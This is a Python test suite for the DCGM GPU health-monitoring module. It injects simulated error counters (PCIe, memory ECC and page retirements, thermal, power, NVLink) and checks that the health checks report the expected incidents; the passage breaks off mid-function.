# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# test the health module for DCGM
import pydcgm
import dcgm_structs
import dcgm_structs_internal
import dcgm_agent
import dcgm_agent_internal
import dcgmvalue
import logger
import test_utils
import dcgm_fields
import time
from ctypes import *
import sys
import os
import pprint
import dcgm_internal_helpers
import dcgm_errors
def skip_test_if_unhealthy(groupObj):
# Skip the test if the GPU is already failing health checks
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
if responseV4.overallHealth != dcgm_structs.DCGM_HEALTH_RESULT_PASS:
msg = "Skipping health check test because we are already unhealthy: "
for i in range(0, responseV4.incidentCount):
if i == 0:
msg += "%s" % responseV4.incidents[i].error.msg
else:
msg += ", %s" % responseV4.incidents[i].error.msg
test_utils.skip_test(msg)
def helper_dcgm_health_set_pcie(handle):
"""
Verifies that the set/get path for the health monitor is working
Checks for call errors are done in the bindings
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetDefaultGroup()
groupObj.health.Set(0)
currentSystems = groupObj.health.Get()
assert (currentSystems == 0)
newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_PCIE
groupObj.health.Set(newSystems)
currentSystems = groupObj.health.Get()
assert (currentSystems == newSystems)
#Set it back to 0 and validate it
groupObj.health.Set(0)
currentSystems = groupObj.health.Get()
assert (currentSystems == 0)
@test_utils.run_with_embedded_host_engine()
def test_dcgm_health_set_pcie_embedded(handle):
helper_dcgm_health_set_pcie(handle)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_health_set_pcie_standalone(handle):
helper_dcgm_health_set_pcie(handle)
@test_utils.run_with_embedded_host_engine()
def test_dcgm_health_invalid_group_embedded(handle):
'''
Validate that group operations fail if a bogus group ID is provided
'''
invalidGroupId = c_void_p(99)
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = pydcgm.DcgmGroup(handleObj, groupId=invalidGroupId)
with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
groupObj.health.Set(dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
groupObj.health.Get()
with test_utils.assert_raises(dcgm_structs.dcgmExceptionClass(dcgm_structs.DCGM_ST_NOT_CONFIGURED)):
groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
def helper_dcgm_health_check_pcie(handle, gpuIds):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
response = groupObj.health.Check()
# we expect that there will be no data here
# inject an error into PCI
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
10, 100) # set the injected data into the future
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_pcie_embedded(handle, gpuIds):
helper_dcgm_health_check_pcie(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_pcie_standalone(handle, gpuIds):
helper_dcgm_health_check_pcie(handle, gpuIds)
def helper_test_dcgm_health_check_mem_dbe(handle, gpuIds):
"""
Verifies that the health check will fail if there's 1 DBE and it continues to be
reported
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
2, -50) # set the injected data to 50 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
# Give it the same failure 45 seconds ago and make sure we fail again
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
2, -45)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
# Make the failure count go down to zero. This should clear the error
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
0, -40)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_PASS)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_dbe(handle, gpuIds):
helper_test_dcgm_health_check_mem_dbe(handle, gpuIds)
def helper_verify_dcgm_health_watch_mem_result(groupObj, errorCode, verifyFail=False, gpuId=0):
"""
Verify that memory health check result is what was expected. If verifyFail is False, verify a pass result,
otherwise verify a failure occurred.
"""
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
if not verifyFail:
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_PASS)
return
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
def helper_reset_page_retirements(handle, gpuId=0, reset_sbe=False):
"""
Helper function to reset non volatile page retirements.
"""
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
0, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
if reset_sbe:
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
0, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
def helper_test_dcgm_health_check_mem_retirements(handle, gpuIds):
"""
Verifies that the health check will fail when the number of non-volatile page retirements
match the failure criteria.
Specifically tests the criteria given in DCGM-458.
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
####### Tests #######
#### Condition 1 ####
### Fail if the total number of page retirements (due to DBE or SBE) meets or exceeds 60
## Test 1: >= 60 page retirements total should fail
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
30, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
30, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we get a failure
helper_verify_dcgm_health_watch_mem_result(groupObj, dcgm_errors.DCGM_FR_RETIRED_PAGES_LIMIT, verifyFail=True,
gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
## Test 2: 59 page retirements total should pass
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
10, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
49, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we pass
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
#### Condition 2 ####
### Fail if > 15 page retirement due to DBEs AND more than 1 DBE page retirement in past week
## Test 1: 15 page retirements due to DBEs should pass
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
15, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we pass
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
## Test 2: 16 page retirements due to DBE should fail (since all 16 are inserted in current week)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
16, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we get a failure
helper_verify_dcgm_health_watch_mem_result(groupObj, dcgm_errors.DCGM_FR_RETIRED_PAGES_DBE_LIMIT,
verifyFail=True, gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
## Test 3: 16 page retirements due to SBEs should pass
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_SBE,
16, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we pass
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId, reset_sbe=True)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
## Test 4: 16 page retirements due to DBEs (with first 15 pages inserted more than 1 week ago,
# and 16th page inserted in current week) should pass
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
15, -604860) # set the injected data to 7 days and 1 minute ago
assert (ret == dcgm_structs.DCGM_ST_OK)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_DBE,
1, -30) # set the injected data to 30 seconds ago
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we pass
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
# Reset the field and verify clean result
helper_reset_page_retirements(handle, gpuId=gpuId)
helper_verify_dcgm_health_watch_mem_result(groupObj, 0, gpuId=gpuId)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_dcgm_health_check_mem_retirements_standalone(handle, gpuIds):
helper_test_dcgm_health_check_mem_retirements(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_dcgm_health_check_mem_retirements_embedded(handle, gpuIds):
helper_test_dcgm_health_check_mem_retirements(handle, gpuIds)
def helper_test_dcgm_health_check_mem(handle, gpuIds):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
100, -40)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1), "Expected 1 incident but found %d" % responseV4.incidentCount
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PENDING_PAGE_RETIREMENTS),\
"Expected %d but found %d" % (dcgm_errors.DCGM_FR_PENDING_PAGE_RETIREMENTS, \
responseV4.incidents[0].error.code)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN),\
"Expected warning but found %d" % responseV4.incidents[0].health
# Clear the error
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING,
0, -35)
assert (ret == dcgm_structs.DCGM_ST_OK)
# Make sure we've set the monitor frequency to less than 35 seconds - that will make us around
# half or less of the 60 seconds we give the data before calling it stale.
cmFieldInfo = dcgm_agent_internal.dcgmGetCacheManagerFieldInfo(handle, gpuId, dcgm_fields.DCGM_FI_DEV_RETIRED_PENDING)
assert cmFieldInfo.monitorFrequencyUsec < 35000000
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_standalone(handle, gpuIds):
helper_test_dcgm_health_check_mem(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_mem_embedded(handle, gpuIds):
helper_test_dcgm_health_check_mem(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_thermal(handle):
"""
Verifies that the set/get path for the health monitor is working
Checks for call errors are done in the bindings
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetDefaultGroup()
groupObj.health.Set(0)
currentSystems = groupObj.health.Get()
assert (currentSystems == 0)
newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_THERMAL
groupObj.health.Set(newSystems)
currentSystems = groupObj.health.Get()
assert (currentSystems == newSystems)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_thermal(handle, gpuIds):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_THERMAL
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuIds[0],
dcgm_fields.DCGM_FI_DEV_THERMAL_VIOLATION, 0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
# we expect that there will be no data here
#assert (dcgm_structs.DCGM_ST_OK == result or dcgm_structs.DCGM_ST_NO_DATA == result)
# inject an error into thermal
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuIds[0],
dcgm_fields.DCGM_FI_DEV_THERMAL_VIOLATION, 1000, 10)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuIds[0])
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_CLOCK_THROTTLE_THERMAL)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_power(handle):
"""
Verifies that the set/get path for the health monitor is working
Checks for call errors are done in the bindings
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetDefaultGroup()
groupObj.health.Set(0)
currentSystems = groupObj.health.Get()
assert (currentSystems == 0)
newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_POWER
groupObj.health.Set(newSystems)
currentSystems = groupObj.health.Get()
assert (currentSystems == newSystems)
def helper_check_health_response_v4(gpuIds, response):
numErrors = 0
if response.version == 0:
numErrors += 1
logger.error("bad response.version x%X" % response.version)
if response.overallHealth != dcgm_structs.DCGM_HEALTH_RESULT_PASS:
numErrors += 1
logger.error("bad response.overallHealth %d. Are these GPUs really healthy?" % response.overallHealth)
if response.incidentCount > 0:
numErrors += 1
logger.error("bad response.incidentCount %d > 0" % (response.incidentCount))
assert numErrors == 0, "Errors were encountered. See above."
def helper_run_dcgm_health_check_sanity(handle, gpuIds, system_to_check):
"""
Verifies that the DCGM health checks return healthy for all GPUs on live systems.
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetGroupWithGpuIds('testgroup', gpuIds)
groupObj.health.Set(system_to_check)
systemObj.UpdateAllFields(1)
#This will throw an exception on error
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
#Check that our response comes back clean
helper_check_health_response_v4(gpuIds, responseV4)
################ Start health sanity checks
# The health sanity checks verify that that the DCGM health checks return healthy for all GPUs on live systems.
# Note: These tests can fail if a GPU is really unhealthy. We should give detailed feedback so that this is attributed
# to the GPU and not the test
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_pcie(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_pcie_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_mem(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_MEM)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_mem_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_MEM)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_inforom(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_INFOROM)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_inforom_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_INFOROM)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_thermal(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_thermal_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_THERMAL)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_power(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_POWER)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_power_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_POWER)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvlink(handle, gpuIds):
#We will get false failures if any nvlinks are down on the GPUs
test_utils.skip_test_if_any_nvlinks_down(handle)
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvlink_standalone(handle, gpuIds):
#We will get false failures if any nvlinks are down on the GPUs
test_utils.skip_test_if_any_nvlinks_down(handle)
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_nonfatal(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_nonfatal_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_fatal(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)
@test_utils.run_with_standalone_host_engine()
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_health_check_sanity_nvswitch_fatal_standalone(handle, gpuIds):
helper_run_dcgm_health_check_sanity(handle, gpuIds, dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)
################ End health sanity checks
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_power(handle, gpuIds):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_POWER
groupObj.health.Set(newSystems)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_VIOLATION,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
skip_test_if_unhealthy(groupObj)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
# we expect that there will be no data here
# inject an error into power
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_VIOLATION,
1000, 10)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuIds[0])
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_POWER)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_CLOCK_THROTTLE_POWER)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_check_nvlink(handle, gpuIds):
helper_health_check_nvlink_error_counters(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_health_check_nvlink(handle, gpuIds):
helper_health_check_nvlink_error_counters(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(20)
@test_utils.run_with_initialized_client()
def test_dcgm_standalone_health_set_nvlink(handle):
"""
Verifies that the set/get path for the health monitor is working
Checks for call errors are done in the bindings
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetDefaultGroup()
groupObj.health.Set(0)
currentSystems = groupObj.health.Get()
assert (currentSystems == 0)
newSystems = currentSystems | dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
groupObj.health.Set(newSystems)
currentSystems = groupObj.health.Get()
assert (currentSystems == newSystems)
def helper_health_check_nvlink_error_counters(handle, gpuIds):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
#We will get false failures if any nvlinks are down on the GPUs
test_utils.skip_test_if_any_nvlinks_down(handle)
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
groupObj.health.Set(newSystems)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
# we expect that there will be no data here
# inject an error into NV Link
